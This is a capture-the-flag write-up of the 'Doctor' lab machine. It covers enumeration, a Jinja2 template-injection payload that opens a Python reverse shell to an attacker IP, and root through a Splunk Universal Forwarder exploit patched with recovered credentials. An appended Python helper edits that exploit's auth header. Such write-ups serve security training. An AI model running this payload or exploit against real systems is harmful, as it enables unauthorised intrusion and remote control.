Doctor

Port Scanning and general enumeration (Nmap, FFuF)

Interesting: port 8089 is splunkd. A bit of research shows this is the management port of a Splunk Universal Forwarder. Let's keep that in mind for later.

Standard enumeration of the site on port 80 doesn't reveal much, but there is one interesting thing to note:

a reference to doctors.htb. Let's add a line to /etc/hosts that points doctors.htb at 10.10.10.209.

New things to play with! Let's run ffuf against the new vhost while we poke around (ffuf wants the scheme in the URL):

ffuf -u http://doctors.htb/FUZZ -w /path/to/wordlist -c

Let’s create an account and see what this app is all about.

Throwing the usual payloads for the usual bugs at the app gives nothing at first glance. But if we go back to the archive endpoint and view its source, we see something interesting: the post title we submitted is rendered there, and a template expression in it gets evaluated.

Ah! Vulnerable to SSTI!

Access (SSTI, reverse shell)

I actually covered this in a writeup for a CTF challenge from Hacktivitycon 2020 called Template Shack. This time, though, instead of walking the subclass list by index to find where subprocess.Popen sits, we'll use a handy payload from PayloadsAllTheThings.

After editing it a bit so that it calls back to our machine. Two things to get right: the blog's renderer ate the double underscores of the dunder attributes (the chain is the PayloadsAllTheThings self.__init__.__globals__ gadget, restored here), and the double quotes inside the command have to be backslash-escaped, otherwise the first one ends the Jinja2 string literal and the expression never parses. The payload we post:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.36\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'").read() }}

Use that as the post title, put whatever you want in the body and submit the post.

Start a listener on port 4444 on your box and reload the archive tab; rendering the archive evaluates the title and the shell calls back.

Privesc (linPEAS, Spelunker)

So now we have a shell on the box. Let's see what linPEAS says.

It flags an interesting entry in a log file: a value sitting where an email address should be.

That doesn't look like an email. Maybe it's the shaun user's password? Turns out that it is. Strange.

Let's take a look at port 8089 again. As mentioned earlier, it's the Splunk Universal Forwarder's management port. There are public exploits for it, including one that, given valid credentials for that API, runs code as the user the forwarder runs as; that's the privilege escalation we're going to use.

First, we need to update the Spelunker script, because it assumes the default credentials admin:changeme (that is what YWRtaW46Y2hhbmdlbWU= base64-decodes to).

This is what we need to change:

Authorization: Basic YWRtaW46Y2hhbmdlbWU=

to

Authorization: Basic c2hhdW46R3VpdGFyMTIz

which is base64 for shaun:Guitar123, the password from the log file. Copy the script onto the box, mark it executable and run it.

Follow the instructions to root!
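The edit above is a one-line change, but a mis-pasted base64 token fails silently as a 401 only after the script is already on the box. Here is an added example, not the exploit's own code, that patches the hard-coded header in the script text and checks that the new value decodes to the intended user:password before anything is uploaded. The script snippet it patches is a constructed stand-in for the real file's header line.

```python
import base64
import re

# Added example (not from the post): swap the exploit script's hard-coded
# admin:changeme Basic-auth header for the recovered shaun credentials and
# confirm the result decodes to what we meant before copying it to the box.

BASIC_RE = re.compile(r"Authorization: Basic ([A-Za-z0-9+/]+=*)")

# Constructed stand-in for the line of the exploit script that carries the header.
SCRIPT = "request += 'Authorization: Basic YWRtaW46Y2hhbmdlbWU=\\r\\n'\n"


def basic_header(user, password):
    """Build the header the script sends for user:password."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def decode_basic(text):
    """Recover (user, password) from the first Basic header in the text."""
    m = BASIC_RE.search(text)
    if m is None:
        raise ValueError("no Basic auth header found")
    user, _, password = base64.b64decode(m.group(1)).decode().partition(":")
    return user, password


def patch_script(text, user, password):
    """Replace every hard-coded Basic header in the script. Refuse to return
    an unchanged script, so a missed line never gets quietly uploaded, and
    re-decode each patched line to prove it carries the new credentials."""
    new_text, count = BASIC_RE.subn(basic_header(user, password), text)
    if count == 0:
        raise ValueError("no Basic auth header found to patch")
    for line in new_text.splitlines():
        if "Authorization: Basic" in line and decode_basic(line) != (user, password):
            raise ValueError("patched header does not decode to the new credentials")
    return new_text


if __name__ == "__main__":
    print("before:", decode_basic(SCRIPT))
    patched = patch_script(SCRIPT, "shaun", "Guitar123")
    print(patched, end="")
    print("after: ", decode_basic(patched))
```

Running it against the real script file is a matter of reading the file into text, calling patch_script, and writing the result back; the decode check is what you want to eyeball before the upload.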